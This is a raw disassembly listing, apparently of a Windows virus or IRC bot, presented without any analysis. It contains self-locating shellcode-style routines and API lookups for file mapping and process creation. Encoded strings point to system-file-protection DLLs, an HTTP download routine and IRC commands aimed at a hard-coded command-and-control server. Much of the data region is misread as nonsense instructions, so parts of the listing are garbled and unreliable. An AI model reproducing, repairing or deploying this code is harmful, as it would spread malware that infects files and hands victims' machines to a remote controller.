; fuck:0048E312�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E6Eh]
stosd
pop ecx
loc_48E5A7: ; CODE XREF: sub_48E59C+E�j
lodsb
test al, al
jnz short loc_48E5A7
loop sub_48E59C
retn
sub_48E59C endp
; =============== S U B R O U T I N E =======================================
sub_48E5AF proc near ; CODE XREF: sub_49012D+25�p
; FUNCTION CHUNK AT 0048E639 SIZE 000003C0 BYTES
; FUNCTION CHUNK AT 0048EA09 SIZE 00000027 BYTES
lea edx, [ebp+101985h]
push edx
call dword ptr [ebp+103EC6h]
mov [ebp+104288h], eax
call near ptr loc_48E5DC+1
dec esp
outsd
outsd
imul esi, [ebp+70h], 50h
jb short loc_48E639
jbe short near ptr loc_48E639+2
insb
db 65h, 67h, 65h
push esi
popa
insb
jnz short loc_48E640
inc ecx
loc_48E5DC: ; CODE XREF: sub_48E5AF+13�p
add [eax-1], dl
sub_48E5AF endp ; sp-analysis failed
xchg eax, ebp
outsb
db 3Eh
adc [eax], al
mov [ebp+10428Ch], eax
retn
; ---------------------------------------------------------------------------
db 5Ch ; \
db 42h ; B
db 61h ; a
db 73h ; s
db 65h ; e
db 4Eh ; N
db 61h ; a
db 6Dh ; m
db 65h ; e
db 64h ; d
db 4Fh ; O
db 62h ; b
db 6Ah ; j
db 65h ; e
db 63h ; c
db 74h ; t
db 73h ; s
db 5Ch ; \
db 56h ; V
db 74h ; t
db 53h ; S
db 65h ; e
db 63h ; c
db 74h ; t
db 0
db 6Ch ; l
db 73h ; s
db 74h ; t
db 72h ; r
db 6Ch ; l
db 65h ; e
db 6Eh ; n
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 4Dh ; M
db 61h ; a
db 70h ; p
db 70h ; p
db 69h ; i
db 6Eh ; n
db 67h ; g
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 50h ; P
db 72h ; r
db 6Fh ; o
db 63h ; c
db 65h ; e
db 73h ; s
db 73h ; s
db 41h ; A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48E5AF
loc_48E639: ; CODE XREF: sub_48E5AF+1F�j
; sub_48E5AF+21�j
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_48E6A3+2
loc_48E640: ; CODE XREF: sub_48E5AF+2A�j
push edx
db 65h
insd
outsd
jz short loc_48E6AB
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_48E6B6+2
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_48E6C2+3
push esp
outsd
outsd
insb
push 33706C65h
xor dl, [ebx+6Eh]
popa
jo short near ptr loc_48E6E1+1
push 4500746Fh
js short loc_48E6DF
jz short near ptr loc_48E6CB+1
push 64616572h
add [esi+69h], al
insb
db 65h
push esp
imul ebp, [ebp+65h], 79536F54h
jnb short loc_48E700
db 65h
insd
push esp
imul ebp, [ebp+65h], 65724600h
db 65h
dec esp
imul esp, [edx+72h], 797261h
inc edi
db 65h
jz short near ptr loc_48E6E3+6
loc_48E6A3: ; CODE XREF: sub_48E5AF+8F�j
imul ebp, [ebp+41h], 69727474h
loc_48E6AB: ; CODE XREF: sub_48E5AF+95�j
bound esi, [ebp+74h]
db 65h
jnb short loc_48E6F2
add [edi+65h], al
jz short near ptr loc_48E6FB+1
loc_48E6B6: ; CODE XREF: sub_48E5AF+A2�j
imul ebp, [ebp+53h], 657A69h
inc edi
db 65h
jz short loc_48E708
loc_48E6C2: ; CODE XREF: sub_48E5AF+AF�j
imul ebp, [ebp+54h], 656D69h
inc edi
loc_48E6CB: ; CODE XREF: sub_48E5AF+C7�j
db 65h
jz short near ptr loc_48E71A+1
outsd
db 64h
jnz short near ptr loc_48E739+5
db 65h
dec eax
popa
outsb
db 64h
insb
db 65h
inc ecx
add [edi+65h], al
jz short near ptr loc_48E72D+6
loc_48E6DF: ; CODE XREF: sub_48E5AF+C5�j
db 65h
insd
loc_48E6E1: ; CODE XREF: sub_48E5AF+BE�j
jo short near ptr loc_48E727+2
loc_48E6E3: ; CODE XREF: sub_48E5AF+F1�j
imul ebp, [ebp+4Eh], 41656D61h
add [edi+65h], al
jz short near ptr loc_48E741+3
db 65h
insd
loc_48E6F2: ; CODE XREF: sub_48E5AF+FF�j
jo short near ptr loc_48E741+3
popa
jz short near ptr loc_48E75E+1
inc ecx
add [edi+65h], al
loc_48E6FB: ; CODE XREF: sub_48E5AF+105�j
jz short loc_48E753
db 65h
jb short near ptr loc_48E772+1
loc_48E700: ; CODE XREF: sub_48E5AF+DB�j
imul ebp, [edi+6Eh], 74654700h
push esi
loc_48E708: ; CODE XREF: sub_48E5AF+110�j
db 65h
jb short near ptr loc_48E77C+2
imul ebp, [edi+6Eh], 417845h
inc edi
db 65h
jz short near ptr loc_48E76B+1
outsd
insb
jnz short near ptr loc_48E781+6
loc_48E71A: ; CODE XREF: sub_48E5AF:loc_48E6CB�j
db 65h
dec ecx
outsb
outsw
jb short near ptr loc_48E78C+2
popa
jz short near ptr loc_48E78C+1
outsd
outsb
inc ecx
loc_48E727: ; CODE XREF: sub_48E5AF:loc_48E6E1�j
add [edi+ebp*2+61h], cl
db 64h
dec esp
loc_48E72D: ; CODE XREF: sub_48E5AF+12E�j
imul esp, [edx+72h], 41797261h
add [ebp+61h], cl
jo short loc_48E78F
loc_48E739: ; CODE XREF: sub_48E5AF+120�j
imul esp, [ebp+77h], 6946664Fh
insb
loc_48E741: ; CODE XREF: sub_48E5AF+13F�j
; sub_48E5AF:loc_48E6F2�j
add gs:[edi+70h], cl
outs dx, byte ptr gs:[esi]
inc esi
imul ebp, [ebp+4Dh], 69707061h
outsb
db 67h
inc ecx
loc_48E753: ; CODE XREF: sub_48E5AF:loc_48E6FB�j
add [edi+70h], cl
outs dx, byte ptr gs:[esi]
push eax
jb short near ptr loc_48E7C9+1
arpl [ebp+73h], sp
loc_48E75E: ; CODE XREF: sub_48E5AF+146�j
jnb short $+2
push eax
jb short loc_48E7D2
arpl [ebp+73h], sp
jnb short near ptr loc_48E794+7
xor al, [esi+69h]
loc_48E76B: ; CODE XREF: sub_48E5AF+164�j
jb short near ptr loc_48E7DA+6
jz short $+2
push eax
jb short near ptr loc_48E7DA+7
loc_48E772: ; CODE XREF: sub_48E5AF+14E�j
arpl [ebp+73h], sp
jnb short near ptr loc_48E7A9+1
xor cl, [esi+65h]
js short near ptr loc_48E7EC+4
loc_48E77C: ; CODE XREF: sub_48E5AF:loc_48E708�j
add [ebx+65h], dl
jz short near ptr loc_48E7C5+2
loc_48E781: ; CODE XREF: sub_48E5AF+169�j
imul ebp, [ebp+41h], 69727474h
bound esi, [ebp+74h]
loc_48E78C: ; CODE XREF: sub_48E5AF+173�j
; sub_48E5AF+170�j
db 65h
jnb short loc_48E7D0
loc_48E78F: ; CODE XREF: sub_48E5AF+188�j
add [ebx+65h], dl
jz short loc_48E7DA
loc_48E794: ; CODE XREF: sub_48E5AF+1B7�j
imul ebp, [ebp+54h], 656D69h
push ebx
insb
db 65h, 65h
jo short $+4
push ebx
jns short loc_48E818
jz short loc_48E80C
insd
push esp
loc_48E7A9: ; CODE XREF: sub_48E5AF+1C6�j
imul ebp, [ebp+65h], 69466F54h
insb
db 65h
push esp
imul ebp, [ebp+65h], 6D6E5500h
popa
jo short loc_48E813
imul esp, [ebp+77h], 6946664Fh
insb
loc_48E7C5: ; CODE XREF: sub_48E5AF+1D0�j
add gs:[esi+69h], dl
loc_48E7C9: ; CODE XREF: sub_48E5AF+1AA�j
jb short near ptr loc_48E83E+1
jnz short loc_48E82E
insb
inc ecx
insb
loc_48E7D0: ; CODE XREF: sub_48E5AF:loc_48E78C�j
insb
outsd
loc_48E7D2: ; CODE XREF: sub_48E5AF+1B2�j
arpl [eax], ax
push edi
jb short loc_48E840
jz short loc_48E83E
inc esi
loc_48E7DA: ; CODE XREF: sub_48E5AF+1E3�j
; sub_48E5AF:loc_48E76B�j ...
imul ebp, [ebp+0], 6441744Eh
push 75h
jnb short loc_48E85A
push eax
jb short near ptr loc_48E84F+3
jbe short near ptr loc_48E84F+5
insb
loc_48E7EC: ; CODE XREF: sub_48E5AF+1CB�j
db 65h, 67h, 65h
jnb near ptr 0E845h
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_48E83B+1
jb short near ptr loc_48E85F+1
popa
jz short loc_48E863
inc esi
imul ebp, [ebp+0], 7243744Eh
db 65h
popa
jz short loc_48E870
push eax
loc_48E80C: ; CODE XREF: sub_48E5AF+1F6�j
jb short loc_48E87D
arpl [ebp+73h], sp
jnb short $+2
loc_48E813: ; CODE XREF: sub_48E5AF+20C�j
dec esi
jz short near ptr loc_48E856+3
jb short loc_48E87D
loc_48E818: ; CODE XREF: sub_48E5AF+1F4�j
popa
jz short loc_48E880
push eax
jb short loc_48E88D
arpl [ebp+73h], sp
jnb short near ptr loc_48E863+5
js short $+2
dec esi
jz short loc_48E86B
jb short loc_48E88F
popa
jz short near ptr loc_48E88F+3
push ebx
loc_48E82E: ; CODE XREF: sub_48E5AF+21C�j
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
inc ebx
jb short near ptr loc_48E89E+1
popa
loc_48E83B: ; CODE XREF: sub_48E5AF+248�j
jz short loc_48E8A2
push ebp
loc_48E83E: ; CODE XREF: sub_48E5AF+228�j
; sub_48E5AF:loc_48E7C9�j
jnb short near ptr loc_48E8A4+1
loc_48E840: ; CODE XREF: sub_48E5AF+226�j
jb short near ptr loc_48E88F+3
jb short loc_48E8B3
arpl [ebp+73h], sp
jnb short $+2
dec esi
jz short loc_48E899
popa
jo short near ptr loc_48E8A4+1
loc_48E84F: ; CODE XREF: sub_48E5AF+238�j
; sub_48E5AF+23A�j
imul esp, [ebp+77h], 6553664Fh
loc_48E856: ; CODE XREF: sub_48E5AF+265�j
arpl [ecx+ebp*2+6Fh], si
loc_48E85A: ; CODE XREF: sub_48E5AF+235�j
outsb
add [esi+74h], cl
dec edi
loc_48E85F: ; CODE XREF: sub_48E5AF+24A�j
jo short loc_48E8C6
outsb
inc esi
loc_48E863: ; CODE XREF: sub_48E5AF+24D�j
; sub_48E5AF+272�j
imul ebp, [ebp+0], 704F744Eh
loc_48E86B: ; CODE XREF: sub_48E5AF+277�j
outs dx, byte ptr gs:[esi]
push eax
jb short loc_48E8DF
loc_48E870: ; CODE XREF: sub_48E5AF+25A�j
arpl [ebp+73h], sp
jnb short loc_48E8C9
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_48E8CB+1
loc_48E87D: ; CODE XREF: sub_48E5AF:loc_48E80C�j
; sub_48E5AF+267�j
jo short near ptr loc_48E8E3+1
outsb
loc_48E880: ; CODE XREF: sub_48E5AF+26A�j
push ebx
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
push eax
jb short near ptr loc_48E8FB+1
loc_48E88D: ; CODE XREF: sub_48E5AF+26D�j
jz short near ptr loc_48E8F3+1
loc_48E88F: ; CODE XREF: sub_48E5AF+279�j
; sub_48E5AF+27C�j ...
arpl [esi+edx*2+69h], si
jb short loc_48E909
jnz short near ptr loc_48E8F7+1
insb
dec ebp
loc_48E899: ; CODE XREF: sub_48E5AF+29B�j
db 65h
insd
outsd
jb short near ptr loc_48E914+3
loc_48E89E: ; CODE XREF: sub_48E5AF+289�j
add [esi+74h], cl
push ecx
loc_48E8A2: ; CODE XREF: sub_48E5AF:loc_48E83B�j
jnz short loc_48E909
loc_48E8A4: ; CODE XREF: sub_48E5AF:loc_48E83E�j
; sub_48E5AF+29E�j
jb short near ptr loc_48E91E+1
dec ecx
outsb
outsw
jb short near ptr loc_48E918+1
popa
jz short loc_48E918
outsd
outsb
push esp
outsd
loc_48E8B3: ; CODE XREF: sub_48E5AF+293�j
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_48E90F+2
jb short loc_48E925
jz short near ptr loc_48E922+1
push esi
imul esi, [edx+74h], 4D6C6175h
loc_48E8C6: ; CODE XREF: sub_48E5AF:loc_48E85F�j
db 65h
insd
outsd
loc_48E8C9: ; CODE XREF: sub_48E5AF+2C4�j
jb short loc_48E944
loc_48E8CB: ; CODE XREF: sub_48E5AF+2CC�j
add [edx+74h], dl
insb
push ebp
outsb
imul esp, [ebx+6Fh], 74536564h
jb short near ptr loc_48E941+2
outsb
db 67h
push esp
outsd
inc ecx
loc_48E8DF: ; CODE XREF: sub_48E5AF+2BF�j
outsb
jnb short near ptr loc_48E94A+1
push ebx
loc_48E8E3: ; CODE XREF: sub_48E5AF:loc_48E87D�j
jz short loc_48E957
imul ebp, [esi+67h], 41535700h
push ebx
jz short loc_48E950
jb short loc_48E965
jnz short near ptr loc_48E962+1
loc_48E8F3: ; CODE XREF: sub_48E5AF:loc_48E88D�j
add [ebx+6Ch], ah
outsd
loc_48E8F7: ; CODE XREF: sub_48E5AF+2E6�j
jnb short loc_48E95E
jnb short near ptr loc_48E969+1
loc_48E8FB: ; CODE XREF: sub_48E5AF+2DC�j
arpl [ebx+65h], bp
jz short $+2
arpl [edi+6Eh], bp
outsb
arpl gs:[eax+eax+67h], si
loc_48E909: ; CODE XREF: sub_48E5AF+2E4�j
; sub_48E5AF:loc_48E8A2�j
db 65h
jz short near ptr loc_48E973+1
outsd
jnb short near ptr loc_48E981+2
loc_48E90F: ; CODE XREF: sub_48E5AF+309�j
bound edi, [ecx+6Eh]
popa
insd
loc_48E914: ; CODE XREF: sub_48E5AF+2ED�j
add gs:[edx+65h], dh
loc_48E918: ; CODE XREF: sub_48E5AF+2FE�j
; sub_48E5AF+2FB�j
arpl [esi+0], si
jnb short near ptr loc_48E981+1
outsb
loc_48E91E: ; CODE XREF: sub_48E5AF:loc_48E8A4�j
add fs:[ebx+6Fh], dh
loc_48E922: ; CODE XREF: sub_48E5AF+30D�j
arpl [ebx+65h], bp
loc_48E925: ; CODE XREF: sub_48E5AF+30B�j
jz short $+2
dec ecx
outsb
jz short loc_48E990
jb short loc_48E99B
db 65h
jz short loc_48E973
insb
outsd
jnb short near ptr loc_48E998+1
dec eax
popa
outsb
db 64h
insb
add gs:[ecx+6Eh], cl
jz short loc_48E9A4
jb short near ptr loc_48E9AE+1
loc_48E941: ; CODE XREF: sub_48E5AF+329�j
db 65h
jz short loc_48E98B
loc_48E944: ; CODE XREF: sub_48E5AF:loc_48E8C9�j
db 65h
jz short loc_48E98A
outsd
outsb
outsb
loc_48E94A: ; CODE XREF: sub_48E5AF+331�j
arpl gs:[ebp+64h], si
push ebx
loc_48E950: ; CODE XREF: sub_48E5AF+33E�j
jz short near ptr loc_48E9B2+1
jz short loc_48E9B9
add [ecx+6Eh], cl
loc_48E957: ; CODE XREF: sub_48E5AF:loc_48E8E3�j
jz short near ptr loc_48E9BC+2
jb short loc_48E9C9
db 65h
jz short near ptr loc_48E9AB+2
loc_48E95E: ; CODE XREF: sub_48E5AF:loc_48E8F7�j
jo short loc_48E9C5
outsb
inc ecx
loc_48E962: ; CODE XREF: sub_48E5AF+342�j
add [ecx+6Eh], cl
loc_48E965: ; CODE XREF: sub_48E5AF+340�j
jz short near ptr loc_48E9CB+1
jb short loc_48E9D7
loc_48E969: ; CODE XREF: sub_48E5AF+34A�j
db 65h
jz short near ptr loc_48E9BA+1
jo short loc_48E9D3
outsb
push ebp
jb short near ptr loc_48E9DC+2
inc ecx
loc_48E973: ; CODE XREF: sub_48E5AF+37E�j
; sub_48E5AF:loc_48E909�j
add [ecx+6Eh], cl
jz short near ptr loc_48E9DC+1
jb short loc_48E9E8
db 65h
jz short near ptr loc_48E9CE+1
db 65h
popa
db 64h
inc esi
loc_48E981: ; CODE XREF: sub_48E5AF+36C�j
; sub_48E5AF+35E�j
imul ebp, [ebp+0], 41564441h
push eax
loc_48E98A: ; CODE XREF: sub_48E5AF:loc_48E944�j
dec ecx
loc_48E98B: ; CODE XREF: sub_48E5AF:loc_48E941�j
xor esi, [edx]
db 2Eh
inc esp
dec esp
loc_48E990: ; CODE XREF: sub_48E5AF+37A�j
dec esp
add [edx+65h], dl
db 67h
inc ebx
insb
outsd
loc_48E998: ; CODE XREF: sub_48E5AF+383�j
jnb short near ptr loc_48E9FD+2
dec ebx
loc_48E99B: ; CODE XREF: sub_48E5AF+37C�j
db 65h
jns short $+3
push edx
db 65h, 67h
dec edi
jo short loc_48EA09
loc_48E9A4: ; CODE XREF: sub_48E5AF+38E�j
outsb
dec ebx
db 65h
jns short near ptr loc_48E9EC+2
js short loc_48E9EC
loc_48E9AB: ; CODE XREF: sub_48E5AF+3AC�j
add [edx+65h], dl
loc_48E9AE: ; CODE XREF: sub_48E5AF+390�j
db 67h
push ecx
jnz short loc_48EA17
loc_48E9B2: ; CODE XREF: sub_48E5AF:loc_48E950�j
jb short near ptr loc_48EA2C+1
push esi
popa
insb
jnz short near ptr loc_48EA1D+1
loc_48E9B9: ; CODE XREF: sub_48E5AF+3A3�j
inc ebp
loc_48E9BA: ; CODE XREF: sub_48E5AF:loc_48E969�j
js short loc_48E9FD
loc_48E9BC: ; CODE XREF: sub_48E5AF:loc_48E957�j
add [edx+65h], dl
db 67h
push ebx
db 65h
jz short loc_48EA1A
popa
loc_48E9C5: ; CODE XREF: sub_48E5AF:loc_48E95E�j
insb
jnz short near ptr loc_48EA2C+1
inc ebp
loc_48E9C9: ; CODE XREF: sub_48E5AF+3AA�j
js short loc_48EA0C
loc_48E9CB: ; CODE XREF: sub_48E5AF:loc_48E965�j
add [esi+33h], dl
loc_48E9CE: ; CODE XREF: sub_48E5AF+3CB�j
imul byte ptr [edx+2]
push esi
push esi
loc_48E9D3: ; CODE XREF: sub_48E5AF+3BD�j
mov edx, esp
push 1
loc_48E9D7: ; CODE XREF: sub_48E5AF+3B8�j
push edx
push dword ptr [edx+18h]
push esi
loc_48E9DC: ; CODE XREF: sub_48E5AF+3C7�j
; sub_48E5AF+3C1�j
call dword ptr [ebp+10428Ch]
mov eax, esp
push esi
push esi
push esi
push eax
loc_48E9E8: ; CODE XREF: sub_48E5AF+3C9�j
push esi
push dword ptr [eax+18h]
loc_48E9EC: ; CODE XREF: sub_48E5AF+3FA�j
; sub_48E5AF+3F7�j
call dword ptr [ebp+103EFAh]
add esp, 10h
pop esi
retn 8
; END OF FUNCTION CHUNK FOR sub_48E5AF
; ---------------------------------------------------------------------------
db 8Dh ;
db 49h ; I
db 0FBh ;
db 2Bh ; +
; ---------------------------------------------------------------------------
loc_48E9FD: ; CODE XREF: sub_48E5AF:loc_48E9BA�j
; sub_48E5AF:loc_48E998�j
enter 6851h, 0
; ---------------------------------------------------------------------------
db 0
db 0
db 0E8h ;
db 8Dh ;
db 4Ch ; L
db 24h ; $
db 3
db 6Ah ; j
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48E5AF
loc_48EA09: ; CODE XREF: sub_48E5AF+3F3�j
add [edx+5], ch
loc_48EA0C: ; CODE XREF: sub_48E5AF:loc_48E9C9�j
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
loc_48EA17: ; CODE XREF: sub_48E5AF+401�j
push esp
push 40h
loc_48EA1A: ; CODE XREF: sub_48E5AF+412�j
push ecx
push edx
push ebx
loc_48EA1D: ; CODE XREF: sub_48E5AF+408�j
call dword ptr [ebp+103F22h]
add esp, 0Ch
call dword ptr [ebp+103F2Ah]
loc_48EA2C: ; CODE XREF: sub_48E5AF:loc_48E9B2�j
; sub_48E5AF+417�j
add esp, 8
retn
; END OF FUNCTION CHUNK FOR sub_48E5AF
; ---------------------------------------------------------------------------
db 8Dh ;
db 95h ;
db 30h ; 0
db 3Eh ; >
db 10h
db 0
db 33h ; 3
db 0C9h ;
db 6Ah ; j
db 0
db 52h ; R
db 68h ; h
db 30h ; 0
db 0
db 32h ; 2
db 0
db 8Bh ;
db 0C4h ;
db 51h ; Q
db 51h ; Q
db 6Ah ; j
db 40h ; @
db 50h ; P
db 51h ; Q
db 6Ah ; j
db 18h
db 83h ;
db 0C0h ;
db 8
db 54h ; T
db 6Ah ; j
db 0Eh
db 50h ; P
db 0FFh
db 95h ;
db 1Eh
db 3Fh ; ?
db 10h
db 0
db 83h ;
db 0C4h ;
db 20h
db 33h ; 3
db 0D2h ;
db 85h ;
db 0C0h ;
db 0Fh
db 99h ;
db 0C2h ;
db 0F7h ;
db 0DAh ;
db 58h ; X
db 23h ; #
db 0C2h ;
db 0C3h ;
db 57h ; W
db 33h ; 3
db 0FFh
db 0E8h ;
db 0C1h ;
db 0FFh
db 0FFh
db 0FFh
db 0Fh
db 84h ;
db 0A5h ;
db 0
db 0
db 0
db 50h ; P
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 8Bh ;
db 0D4h ;
db 6Ah ; j
db 0
db 8Bh ;
db 0CCh ;
db 6Ah ; j
db 40h ; @
db 68h ; h
db 0
db 0
db 10h
db 0
db 6Ah ; j
db 2
db 52h ; R
db 6Ah ; j
db 0
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 6Ah ; j
db 0
db 51h ; Q
db 53h ; S
db 50h ; P
db 0FFh
db 95h ;
db 12h
db 3Fh ; ?
db 10h
db 0
db 5Fh ; _
db 59h ; Y
db 0FFh
db 95h ;
db 62h ; b
db 3Eh ; >
db 10h
db 0
db 85h ;
db 0FFh
db 74h ; t
db 71h ; q
db 8Bh ;
db 8Dh ;
db 90h ;
db 15h
db 10h
db 0
db 0E3h ;
db 0Ch
db 8Dh ;
db 95h ;
db 0
db 10h
db 10h
db 0
db 3
db 0D1h ;
db 57h ; W
db 53h ; S
db 0FFh
db 0D2h ;
db 8Bh ;
db 85h ;
db 0FEh ;
db 3Eh ; >
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 16h
db 29h ; )
db 0
db 0
db 0E8h ;
db 2Bh ; +
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 16h
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 63h ; c
db 29h ; )
db 0
db 0
db 0E8h ;
db 1Ah
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 2
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 6Ah ; j
db 29h ; )
db 0
db 0
db 0E8h ;
db 9
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 6
db 3Fh ; ?
db 10h
db 0
db 85h ;
db 0C0h ;
db 74h ; t
db 20h
db 8Dh ;
db 8Fh ;
db 77h ; w
db 29h ; )
db 0
db 0
db 0E8h ;
db 0F4h ;
db 0FEh ;
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 0Eh
db 3Fh ; ?
db 10h
db 0
db 85h ;
db 0C0h ;
db 74h ; t
db 0Bh
db 8Dh ;
db 8Fh ;
db 84h ;
db 29h ; )
db 0
db 0
db 0E8h ;
db 0DFh ;
db 0FEh ;
db 0FFh
db 0FFh
db 8Bh ;
db 0C7h ;
db 5Fh ; _
db 0C3h ;
db 55h ; U
db 0E8h ;
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101B24h
xor ecx, ecx
lea eax, [ebp+101EAFh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+103E8Eh]
xchg eax, [esp]
call dword ptr [ebp+103E62h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1B53ED81h, 0FF6A0010h, 1B1E958Dh, 52500010h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B64h, 85C720CDh
dd 101B66h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h
dd 69C3F075h, 103F7C95h, 8840500h, 95894208h, 103F7Ch
dd 55C3E2F7h, 0E8h, 0ED815D00h, 101BADh, 3F809D8Bh, 7C830010h
dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0B695FF00h
dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h
dd 0B295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h
dd 68016Ah, 52400000h, 3E7E95FFh, 85960010h, 505B74F6h
dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F5Eh
dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EF695FFh
dd 85590010h, 56D075C0h, 3E6295FFh, 578D0010h, 6A575244h
dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h
dd 3E8695FFh, 0C4810010h, 208h, 82474FFh, 3F4E95FFh, 0FF530010h
dd 103F4E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10158C8Dh
dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh
dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h
dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h
dd 6A51CEh, 0FF535651h, 103F4695h, 0C13B5900h, 0DF850Fh
dd 858D0000h, 101EA3h, 0C68006Ah, 50000000h, 4695FF53h
dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh
dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h
dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h
dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh
dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h
dd 103EE6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh
dd 64616Fh, 3F5695FFh, 0C0850010h, 0C9333674h, 3F808589h
dd 68510010h, 80000200h, 50565151h, 3F5A95FFh, 958D0010h
dd 101BA7h, 54C93350h, 51525051h, 8E95FF51h, 8700103Eh
dd 95FF2404h, 103E62h, 8D80C3F8h, 10157Fh, 6AC3F901h, 0FF016A01h
dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h
dd 101DCBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh
dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F2295h, 968D8B00h
dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h
dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh
dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h
dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h
dd 2007473h, 500000h, 70000000h, 69786F72h, 72692E6Dh
dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 62777A6Ah
dd 6C696370h, 4553550Ah, 4A622052h, 204E494Fh, 72697626h
dd 550A7574h, 0E8h, 0ED815D00h, 101EB5h, 157F85C6h, 0FF000010h
dd 103EBA95h, 1FE8C100h, 1E6A3C74h, 3E72B58Bh, 0AC590010h
dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F76BDh, 2768B00h
dd 0A566A557h, 38EC858Dh, 858F0010h, 103912h, 0FA4689FAh
dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch
dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EC695h
dd 74C00B00h, 26A930Dh, 6E95FF53h, 0FF00103Eh, 97E893D0h
dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EC695h
dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h
dd 10432485h, 51515100h, 51515051h, 0C295FF51h, 0E800103Eh
dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EC695h, 0AE800h
dd 73770000h, 6E697270h, 416674h, 6E95FF50h, 8900103Eh
dd 103E7685h, 8D310F00h, 1019858Dh, 7C858900h, 5100103Fh
dd 3EC695FFh, 68930010h, 4, 1992B58Dh, 8D590010h, 103F62BDh
dd 0F5C2E800h, 0C766FFFFh, 101E7585h, 83500000h, 101E77A5h
dd 958D0000h, 101E35h, 16A5450h, 6852006Ah, 80000002h
dd 3F6695FFh, 0C0850010h, 8D22755Ah, 101E688Dh, 66A5200h
dd 1E75B58Dh, 56540010h, 52515050h, 3F6A95FFh, 0FF580010h
dd 103F6295h, 8385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 0C695FF00h, 9300103Eh, 768h, 0E9B58D00h
dd 59001018h, 3F32BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h
dd 2E54454Eh, 4C4C44h, 3EC695FFh, 0C0850010h, 235840Fh
dd 68930000h, 5, 1927B58Dh, 8D590010h, 103F4EBDh, 0F506E800h
dd 0BD83FFFFh, 103F52h, 10840F00h, 81000002h, 190ECh, 1685400h
dd 0FF000001h, 103F3295h, 90C48100h, 50000001h, 6AD48Bh
dd 5295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0E695FF00h
dd 0EB00103Eh, 77BD83E2h, 101Eh, 858D2975h, 101E7Bh, 3E95FF50h
dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh
